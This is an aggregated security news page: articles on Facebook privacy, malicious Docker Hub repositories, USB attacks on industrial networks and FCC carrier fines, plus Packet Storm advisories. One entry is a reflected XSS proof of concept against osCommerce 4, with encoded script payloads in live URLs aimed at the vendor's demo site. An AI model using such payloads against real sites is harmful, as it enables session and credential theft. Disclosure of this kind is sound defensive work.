As the social media giant celebrates its two-decade anniversary, privacy experts reflect on how it changed the way the world shares information.

SourceL Skorzewiak via Alamy Stock Photo

In the 20 years since then-Harvard University student Mark Zuckerberg launched Facebook, there has been a profound shift in our understanding of privacy and security in the digital age. Facebook's path to becoming a digital town square has been fraught with challenges as the company — and the rest of the world — balanced the human desire to share information with the expectation of personal privacy.

In February, Zuckerberg went before a Senate committee and made apologies to parents who blame social media for what they say was its role in their children's death by suicide or from drug overdoses. Zuckerberg has appeared before congressional committees multiple times over the years to address concerns about the platform's impact. The issue of privacy, security, and Facebook has been a long-standing lightning rod, says Martin J. Kraemer, a security awareness advocate at KnowBe4 who has a doctorate in cybersecurity.

"Facebook's fundamental purpose, centered around the systematic collection of information, naturally conflicts with privacy and data protection laws," Kraemer says.

The social media company's missteps over the years have shaped the broader discussions and regulations around data privacy. In fact, it is that tension between social connectivity and privacy rights that prompted the need for robust data protection measures, influencing the creation of significant legal frameworks, like Europe's General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA).

The Cambridge Analytica scandal in 2016 was a watershed moment for many, as the company's decision to grant third-party entities with unethical access to user data underscored the potential for personal data to be weaponized against democratic processes. This incident, according to Kraemer, was a direct catalyst for the CCPA and marked a decisive turn in how policymakers and the public at large perceived and prioritized online privacy and data security.

"Cambridge Analytica was the first time the dangers of mass data collection and processing became a tangible reality for the public," Kraemer says.

**The 'Attention Economy': Your Data Up For Sale**

Facebook has also been a key player in the development of the "attention economy," says Justin Daniels, a faculty member at IANS Research. Its creation catalyzed a shift toward the sale of user data as a commodity sold to the highest bidder under the guise of a "free" service.

"Their algorithm, designed to keep you on the site with things that you emotionally respond to, has resulted in the following: Information is available everywhere, yet the facts prove elusive, and anyone who disagrees with you becomes your adversary," Daniels says. "Our need to have convenience above all has made privacy and security afterthoughts for too many people."

The platform's initial slow response to recognize its role in disseminating misinformation, as evidenced by Zuckerberg's later retracted comments on the 2016 election, underscores the company's significant impact, Daniels says. Resulting state laws in Texas and Florida, targeting big tech, highlight a legislative response to privacy concerns directly influenced by Facebook's actions. Facebook's long-standing stance of neutrality as mere "engineers" has also allowed misinformation to proliferate, causing harm and dividing communities, he says.

Looking ahead, Daniels foresees a challenging future for online privacy and security, particularly with the advent of AI.

"If you connect the dots, you see that we are paying the price in privacy and security for Congressional inaction on the digital economy," he says. "They basically let the private sector innovate without any rules. Since big tech business models depend on collecting personal information, they are never going to voluntarily limit themselves, as data collection is critical to their business model. They are the richest companies in human history and now have great influence. An AI black swan event will be the culmination of this lack of regulatory oversight."

**A Privacy-Free Future?**

Like Daniels, AJ Nash, VP and Distinguished Fellow of Intelligence at ZeroFox, also thinks the quest for profitability, driving platforms like Facebook to maximize user engagement, comes at the expense of user privacy. Social media companies are neither legally accountable for user content, thanks to Section 230(c)(1) of the Communications Decency Act, nor are they obligated to adhere to First Amendment principles, he notes. That means policy changes within these platforms are primarily motivated by either the pursuit of growth or forced with governmental mandates, such as GDPR.

"If the user base shrinks or engagement drops as a result of user concerns regarding censorship, mis/dis/malinformation, privacy, or security \[for example\], social media platforms will likely be motivated to address those concerns with new policies," Nash says. "Beyond that, the only motivation any private corporation — including social media platforms — has for making any policy changes will likely be when they are required to do so by a government with the authority to enforce such mandates."

And as anyone working in security knows, social media's extensive data collection practices have also become a goldmine for attackers, enabling crimes ranging from theft to influence campaigns designed to sway public opinion — underscoring the complexity of securing user data against cyber threats on social sites that are designed to be, well, social.

"I recently read that 1.4 billion social media accounts are hacked every month, showing that hackers aren't reluctant to attack users directly," Nash says. "Social media platforms can \[and do\] collect an impressive amount of information about their users, including name, age, gender, location, IP address, devices used, hobbies/interests, shopping tendencies, political views, and individual or group pattern of life analysis … the list goes on. Most \[if not all\] social media platforms have reportedly been compromised at least once."

In light of this near-constant onslaught of attacks, Nash thinks there will be a shift toward resignation and skepticism among users. The concept of privacy also will be increasingly viewed as untenable in the face of the Internet and social media's expansion, he says.

"I think we've reached a point where most people believe they've been compromised and are becoming numb to — and skeptical of — the idea that their privacy can be protected," Nash says. "The two youngest generations seem largely less concerned with privacy than their predecessors. Social media probably played a significant role in all of this. As people spent more time on these platforms over the last two decades, they have grown accustomed to the news of data leaks, while becoming more interested in the potential benefits of less privacy than the associated risks. To be frank, I think we are nearing — if not already at — the dawn of a post-privacy world."

**About the Author(s)**

Contributing Writer, Dark Reading

Joan Goodchild is a veteran journalist, editor, and writer who has been covering security for more than a decade. She has written for several publications and previously served as editor-in-chief for CSO Online.

Facebook at 20: Contemplating the Cost of Privacy

The purported metadata for each these containers had embedded links to malicious files.

Source: Tada Images via Shutterstock

Docker has removed nearly 3 million public repositories from Docker Hub after researchers discovered each one to be imageless and have no content besides an accompanying apparent description page that contained links to malicious content instead.

Researchers from JFrog spotted the threat in a recent investigation and identified the containers as being used in three large-scale campaigns to distribute spam and malware. Docker has since instituted a new mechanism that prevents links to external resources in the description pages of imageless repositories.

**More Moderation Needed?**

"Unlike typical attacks targeting developers and organizations directly, the attackers in this case tried to leverage Docker Hub's platform credibility, making it more difficult to identity the phishing and malware installation attempts," JFrog said in an April 30 report. "Almost 3 million malicious repositories, some of them active for over three years, highlight the attackers' continued misuse of the Docker Hub platform and the need for constant moderation on such platforms."

JFrog found that some 4.6 million imageless repositories were published on Docker Hub over a five-year period. Of that, nearly all of them had associated metadata that was malicious in nature. JFrog researchers counted a total of 208,739 fake accounts that the attackers used to upload the malicious repositories.

According to JFrog, what enabled the threat actors is a Docker policy that allows users to include short text descriptions and metadata in HTML format, along with any container images that they publish to Docker Hub. The purpose in allowing these descriptions is to enable users to search for and find images on the cloud-based registry service that they might find useful for their projects. The feature allowed threat actors to upload imageless containers and to relatively easily include description pages that had embedded links to spam, phishing, and malware sites.

The mass uploads happened in two distinct waves — one in 2021 and the other in 2023. JFrog researchers were able to tie many of the 2021 repository uploads to a campaign to get users to download pirated content and cheats for video games. Most of the URLs in the campaign resolved to sites for malicious file downloads. If a server hosting malicious files was shut down or became otherwise unavailable, the links resolved to a different active server. Another mass upload in 2021 involved a free e-book phishing campaign that appeared designed to steal credit card information.

The 2023 uploads to Docker Hub were a repeat of the 2021 campaign involving pirated content and video game cheats. But instead of the repositories directly pointing to malicious sources, JFrog found them pointing to legitimate resources that quickly redirected victims to a malicious source. One page on blogger.com, for instance, took all of 500 milliseconds to redirect visitors to the malicious payload.

JFrog also uncovered a third campaign that involved a threat actor uploading 1,000 repositories to Docker Hub daily for three years. While the content in the associated documentation appeared harmless, the motive was clearly malicious, JFrog said. The company surmised the threat actor might have been carrying out some kind of a stress testing before launching a malicious campaign.

**Taking Advantage of a Policy Loophole**

Brian Moussalli, malware research team leader at JFrog, says the threat actors were able to carry out the attacks due to the lack of a policy in place that could have prevented it. "After we disclosed the attacks to Docker Hub, they implemented a protection mechanism that blocks embedding links to external resources in the description pages of imageless repositories," he says.

It's hard to tell how effective the malicious campaigns really were, Moussalli says. But it's likely the attackers used a legitimate site like Docker Hub to host pages containing links to malicious files, so users searching for pirated content, video game cheats, and free e-books wouldn't get suspicious. "Another option could be that they used Docker Hub for legitimacy but spread the links to those pages via direct messages to victims," Moussalli says. "Unfortunately, we're unable to determine how exactly victims were manipulated into clicking those links."

Docker can make things harder for threat actors by implementing restriction on mass creation of accounts, alongside enforcing new rules on repository creation, he says. For example, it could prohibit creation of imageless repositories or not allow new users to embed external links for some time after creation of the account or the repository.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Attackers Planted Millions of Imageless Repositories on Docker Hub

London Drugs offered no details about the nature of the incident, nor when its pharmacies would be functioning normally again.

Source: ton koene via Alamy Stock Photo

London Drugs, a Canadian pharmacy chain, has closed its stores until further notice due to an "operational issue."

A London Drugs spokesperson said the closure of stores in British Columbia, Alberta, and Saskatchewan is due to a "cybersecurity incident" that was discovered earlier this week, according to The Register.

The company doesn't believe any customer or employee data was affected, and it's working with third-party experts to investigate further. London Drugs also hasn't disclosed what kind of cyber incident occurred, such as a ransomware attack, nor who was responsible. It is unclear when stores will be operating regularly once more.

The retail chain posted on social platform X that its "pharmacists are standing by to support with urgent pharmacy needs." It recommends customers call in advance should they need services from their local pharmacy.

**About the Author(s)**

Canadian Drug Chain in Temporary Lockdown Mode After Cyber Incident

China's brain-computer interface technology is catching up to the US. But it envisions a very different use case: cognitive enhancement.

At a tech forum in Beijing last week, a Chinese company unveiled a “homegrown” brain-computer interface that allowed a monkey to seemingly control a robotic arm just by thinking about it.

In a video shown at the event, a monkey with its hands restrained uses the interface to move a robotic arm and grasp a strawberry. The system, developed by NeuCyber NeuroTech and the Chinese Institute for Brain Research, involves soft electrode filaments implanted in the brain, according to state-run news media outlet Xinhua.

Researchers in the US have tested similar systems in paralyzed people to allow them to control robotic arms, but the demonstration underscores China’s progress in developing its own brain-computer interface technology and vying with the West.

Brain-computer interfaces, or BCIs, collect and analyze brain signals, often to allow direct control of an external device, such as a robotic arm, keyboard, or smartphone. In the US, a cadre of startups, including Elon Musk’s Neuralink, are aiming to commercialize the technology.

William Hannas, lead analyst at Georgetown University’s Center for Security and Emerging Technology (CSET), says China is quickly catching up with the US in terms of its BCI technology. “They’re strongly motivated,” he says of the Asian superpower. “They're doing state-of-the-art work, or at least as advanced as anybody else in the world.”

He says China has typically lagged behind the US in invasive BCIs—that is, those that are implanted in the brain or on its surface—choosing instead to focus on noninvasive technology that’s worn on the head. But it’s quickly catching up on implantable interfaces, which are being explored for medical applications.

More concerning, though, is China’s interest in noninvasive BCIs for the general population. Hannas coauthored a report released in March that examines Chinese research on BCIs for nonmedical purposes.

“China is not the least bit shy about this,” he says, referring to ethical guidelines released by the Communist Party in February 2024 that include cognitive enhancement of healthy people as a goal of Chinese BCI research. A translation of the guidelines by CSET says, “Nonmedical purposes such as attention modulation, sleep regulation, memory regulation, and exoskeletons for augmentative BCI technologies should be explored and developed to a certain extent, provided there is strict regulation and clear benefit.”

The translated Chinese guidelines go on to say that BCI technology should avoid replacing or weakening human decisionmaking capabilities “before it is proven to surpass human levels and gains societal consensus, and avoid research that significantly interferes with or blurs human autonomy and self-awareness.”

These nonmedical applications refer to wearable BCIs that rely on electrodes placed on the scalp, also known as electroencephalography or EEG devices. Electrical signals from the scalp are much harder to interpret than those inside the brain, however, and there’s a huge effort in China to use machine learning techniques to improve analysis of brain signals, according to the CSET report.

A handful of US companies are also developing wearable BCIs that arguably fall under the category of cognitive enhancement. For instance, Emotiv of San Francisco and Neurable in Boston are starting to sell EEG headsets intended to improve attention and focus. The US Department of Defense has also funded research on wearable interfaces that could ultimately enable control of cyber-defense systems or drones by military personnel.

China Has a Controversial Plan for Brain-Computer Interfaces

USBs have something the newest, hottest attack techniques lack: the ability to bridge air gaps.

Source: Mohammad Aaref Barahouei via Alamy Stock Photo

Industrial cyberattackers are increasingly using removable media to penetrate operational technology (OT) networks, then leveraging the same old malware and vulnerabilities to make their mark.

For whatever reason, USB devices are a la mode again with some of the world's premier threat actors. Nowhere is this more evident than in the OT space where, according to Honeywell's "2024 USB Threat Report," attackers are "clearly" turning to USBs to get a foothold in industrial networks.

With that foothold, Honeywell reports, attackers are forgoing sophisticated exploitation techniques, zero-day vulnerabilities, or novel malware. Instead, they're leveraging old tools and bugs, plus the built-in capabilities of OT control systems to achieve their end goals.

**Why USBs?**

USBs have something that none of the newest, hottest attack techniques do: the ability to bridge air gaps.

True air gaps are physical separations between OT and IT networks designed to let no malicious attacks pass through. Some also use the term to describe other kinds of setups that distinguish IT and OT systems using access controls, segmentation, and the like. Air gaps are most often used in high-risk industries — think nuclear, military, financial services, etc. — where other means of demarcating IT and OT networks won't cut it.

"A lot of operational facilities are entirely air gapped," explains Matt Wiseman, director of OT product marketing at OPSWAT. "Those more modern approaches like email-based attack — something over the network — aren't really as effective when \[the OT systems\] are disconnected from the broader Internet. You need to be more creative, think outside the box. USBs and removable media are very interesting because they're the only threat you can pick up in your pocket and carry beyond that air gap."

Interestingly, the trend seems to have been born during COVID. In 2019, only 9% of USB-carried cyber threats to industry were actually designed for USBs. By 2022 — and consistently ever since — that number exceeded 50%.

Having crossed that air gap with a USB, attackers are opting for living-off-the-land tactics to perform data collection and exfiltration (observed in 36% of Honeywell's detected USB attacks), defense evasion (29%), and escalation privileges (18%), ultimately achieving persistence in the operational network.

Clearly novel and powerful malware and vulnerabilities are not the focus, as brand name tools of yesteryear such as BlackEnergy and Industroyer (aka CrashOverride) are still making rounds. The most common vulnerabilities exploited in such attacks — such as CVE-2010-2883 and CVE-2017-11882 — are equally dated. All of the most common CVEs listed in Honeywell's report have been known since at least 2018.

In most cases, the goal of these attacks is disruption or destruction. Around 80% of USB-based threats every year now are capable of causing disruptions to OT systems, including loss of visibility or control, or worse (ransomware, wipers, etc.).

**Defending Against USB Threats**

The good news for defenders is that with such antiquated threat vectors, fancy and expensive solutions aren't necessarily the solution. "You can always go with the fundamentals," Wiseman says, meaning strict USB policies and procedures.

At many organizations, he says, "You go back a number of years, there was an honor system. 'Hey, did you scan that?' Now you have technology that can check to make sure. If you plug something in, it's not going to work unless it has been scanned and checked by some type of formal security solution."

This technology often takes the form of a kiosk or "sanitation station" for scanning removable media, placed strategically at the exterior of a sensitive site in order to make sure no malicious ones make their way through. Sometimes those stations are paired with file transfer systems to ensure that no outside device ever actually has to cross the threshold of an industrial control floor.

"We're seeing more mature conversations now. What's our mobile program? What's the process for employees? What's the process for guests? How do we manage these devices? How do we view the activity that's occurring? And how do we ensure that we're ahead of it going forward?" he says. "There's definitely a massive realization of the threat that these devices can pose."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

To Damage OT Systems, Hackers Tap USBs, Old Bugs &amp; Malware

Verizon, AT&T, and T-Mobile USA are being fined for sharing location data. They plan to appeal the decision, which is the culmination of a four-year investigation into how carriers sold customer data to third parties.

Source: Wavebreak Media ltd via Alamy Stock Photo

The Federal Communications Commission (FCC) has fined the top US wireless carriers a collective $200 million for sharing access to customers' location information without consent, the culmination of an action proposed four years ago as authorities continue to grapple with how to reel in companies' handling of sensitive personal data. For carriers, who note that the fines are based on outdated programs that no longer exist, the action represents unsettled regulatory waters as requirements for handling customer data security and privacy in the modern era continue to shake out.

Specifically, the FCC fined Sprint and T-Mobile USA, which have merged since the investigation began, more than $12 million and $80 million, respectively; AT&T more than $57 million; and Verizon almost $47 million.

The agency proposed the fines in 2020 based on an investigation that started after reports that a Missouri sheriff consistently used a "location-finding service" operated by Securus, a company that provides and monitors telecommunications service in correctional facilities, to access the location information of the wireless carriers' customers without their consent between 2014 and 2017.

The case ultimately revealed that the four telecom providers had programs in place at the time that were selling customer-location data to two data-aggregation firms, who then resold access to this data to other entities.

"This action demonstrated the carriers offloading obligations to obtain customer consent onto downstream recipients of location information," which in many instances meant customers did not actually consent to releasing their data, according to an FCC press release (PDF) on the decision. For their part, the carriers say that the data was shared with the third parties in order to enable location-based safety services such as roadside assistance.

"Our communications providers have access to some of the most sensitive information about us," said FCC Chairwoman Jessica Rosenworcel in a statement on the fines. "These carriers failed to protect the information entrusted to them."

This is likely not the end of the fines: The commission also said that it plans to continue to resolve these types of older privacy cases regarding customer data, holding "all carriers accountable and making sure they fulfill their obligations to their customers as stewards of this most private data," she said.

**Wireless Cos Push Back on FCC Privacy Fines**

All of the carriers confirmed to Dark Reading that they will go to court to appeal the decision, which was based on a provision of the Communications Act of 1934 that requires US wireless carriers to take reasonable steps to safeguard specific customer data, such as location information.

Generally, the companies claim the action by the FCC is based on outdated scenarios at the telecom providers that have since been remedied, and they no longer allow third parties to access sensitive customer location-based data.

Verizon spokesman Rich Young says the order concerns an old program at Verizon that required customers to opt in and was shut down more than five years ago. The program "was intended to support services like roadside assistance and medical alerts," he tells Dark Reading, and Verizon shuttered it when the company discovered it was being used fraudulently.

"Verizon is deeply committed to protecting customer privacy," Young says. "Unfortunately, the  FCC's order gets it wrong on both the facts and the law, and we plan to appeal this decision."

For its part, T-Mobile USA gave Dark Reading a statement to much the same effect: "This industry-wide third-party aggregator location-based services program was discontinued more than five years ago after we took steps to ensure that critical services like roadside assistance, fraud protection, and emergency response would not be disrupted. We take our responsibility to keep customer data secure very seriously and have always supported the FCC's commitment to protecting consumers, but this decision is wrong, and the fine is excessive. We intend to challenge it."

AT&T too plans to appeal the fines, which apply for a service that was discontinued in 2019.

"The FCC order lacks both legal and factual merit," a spokesperson says. "It unfairly holds us responsible for another company's violation of our contractual requirements to obtain consent, ignores the immediate steps we took to address that company's failures, and perversely punishes us for supporting life-saving location services like emergency medical alerts and roadside assistance that the FCC itself previously encouraged. We expect to appeal the order after conducting a legal review."

A spokesman for CTIA, a telecommunications industry trade association representing US carriers and resellers, also criticized the fines, citing a "broken enforcement process" on the part of the FCC that deserves examination by Congress.

"After touting the potential of location-based services to provide benefits like roadside assistance and emergency medical alerts, the FCC refused CTIA's request for guidance on how providers should run those programs, and is now penalizing providers for facilitating them," said CTIA senior vice president and chief communications officer Nick Ludlum, in a media statement.

**Carrier Uncertainly: Customer-Privacy Worries Persist**

Complaints that the FCC is behind the times may indeed be justified, as the commission is not known for moving quickly on clarifying how telecom and VoIP providers handle customer privacy.

For instance, it took the FCC 16 years to update how telecom and VoIP providers report data-breaches, issuing new rules in February of this year that they must notify customers whenever there's personally identifiable information (PII) involved in a cyber incident. The new rules — which also require carriers and service providers to report breaches to the FCC, the FBI, and the Secret Service within seven days of discovery — were the first since 2007 to be issued by the commission regarding data-breach notifications.

Meanwhile, the issue of customer privacy when it comes to carriers continues to be a worry, and the fines appear to demonstrate a heavy hand by the FCC in holding communications providers accountable when private customer data leaks. Abroad, other privacy troubles concerning how carriers handle customer data also are brewing.

For example, a huge swathe of telecom customers in Namibia recently were faced with losing their phone service if they didn't hand over sensitive biometric data to the country's premier telco, Mobile Telecommunications Ltd. The potential privacy threat occurred after a well-intentioned plan to combat mobile fraud and identity theft went astray.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Wireless Carriers Face $200M FCC Fine As Data Privacy Waters Roil

osCommerce version 4 suffers from a cross site scripting vulnerability. Original discovery of cross site scripting in this version is attributed to CraCkEr in November of 2023.

    # Exploit Title: osCommerce 4 - Reflected XSS# Exploit Author: skalvin# Date: 22/04/2024# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/furniture/# Tested on: Windows 11 Pro# Impact: Manipulate the content of the site# CVE: CVE-2024-4348# VDB: VDB-262488# CWE: CWE-79 / CWE-74 / CWE-707# CAPEC: CAPEC-10 / CAPEC-209 / CAPEC-250# ATT&CK: T1059.007## DescriptionAttacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsGET parameter 'cat' is vulnerable to RXSSPath: /furniture/catalog/all-productshttps://demo.oscommerce.com/furniture/catalog/all-products?cat=[XSS]https://demo.oscommerce.com/watch/catalog/all-products?cat=[XSS]## Live POC:https://demo.oscommerce.com/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1https://demo.oscommerce.com/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1[-] Done

osCommerce 4 Cross Site Scripting

Ubuntu Security Notice 6761-1 - It was discovered that Anope did not properly process credentials for suspended accounts. An attacker could possibly use this issue to normally login to the platform as a suspended user after changing their password.

==========================================================================  
Ubuntu Security Notice USN-6761-1  
April 30, 2024

anope vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Anope could be made to bypass authentication checks for suspended accounts.

Software Description:  
- anope: an open source set of IRC Services

Details:

It was discovered that Anope did not properly process credentials for  
suspended accounts. An attacker could possibly use this issue to normally  
login to the platform as a suspended user after changing their password.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   anope                           2.0.12-1ubuntu1

Ubuntu 23.10  
   anope                           2.0.12-1ubuntu0.23.10.1

Ubuntu 22.04 LTS  
   anope                           2.0.9-1ubuntu0.1

Ubuntu 20.04 LTS  
   anope                           2.0.6-1ubuntu0.1

Ubuntu 18.04 LTS  
   anope                           2.0.4-2ubuntu0.1~esm1  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   anope                           2.0.3-1ubuntu0.1~esm1  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6761-1  
   CVE-2024-30187

Package Information:  
   https://launchpad.net/ubuntu/+source/anope/2.0.12-1ubuntu1  
   https://launchpad.net/ubuntu/+source/anope/2.0.12-1ubuntu0.23.10.1  
   https://launchpad.net/ubuntu/+source/anope/2.0.9-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/anope/2.0.6-1ubuntu0.1

Ubuntu Security Notice USN-6761-1

Red Hat Security Advisory 2024-2517-03 - An update for wpa_supplicant is now available for Red Hat Enterprise Linux 9. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2517.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: wpa_supplicant security updateAdvisory ID:        RHSA-2024:2517-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2517Issue date:         2024-04-30Revision:           03CVE Names:          CVE-2023-52160====================================================================Summary: An update for wpa_supplicant is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The wpa_supplicant packages contain an 802.1X Supplicant with support for WEP, WPA, WPA2 (IEEE 802.11i / RSN), and various EAP authentication methods. They implement key negotiation with a WPA Authenticator for client stations and controls the roaming and IEEE 802.11 authentication and association of the WLAN driver.Security Fix(es):* wpa_supplicant: potential authorization bypass (CVE-2023-52160)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-52160References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.4_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2264593

Red Hat Security Advisory 2024-2517-03

Red Hat Security Advisory 2024-2438-03 - An update for pam is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2438.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: pam security updateAdvisory ID:        RHSA-2024:2438-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2438Issue date:         2024-04-30Revision:           03CVE Names:          CVE-2024-22365====================================================================Summary: An update for pam is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Pluggable Authentication Modules (PAM) provide a system to set up authentication policies without the need to recompile programs to handle authentication.Security Fix(es):* pam: allowing unprivileged user to block another user namespace (CVE-2024-22365)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-22365References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.4_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2257722https://issues.redhat.com/browse/RHEL-16727https://issues.redhat.com/browse/RHEL-20943https://issues.redhat.com/browse/RHEL-22300https://issues.redhat.com/browse/RHEL-5099https://issues.redhat.com/browse/RHEL-5100

Tag

#auth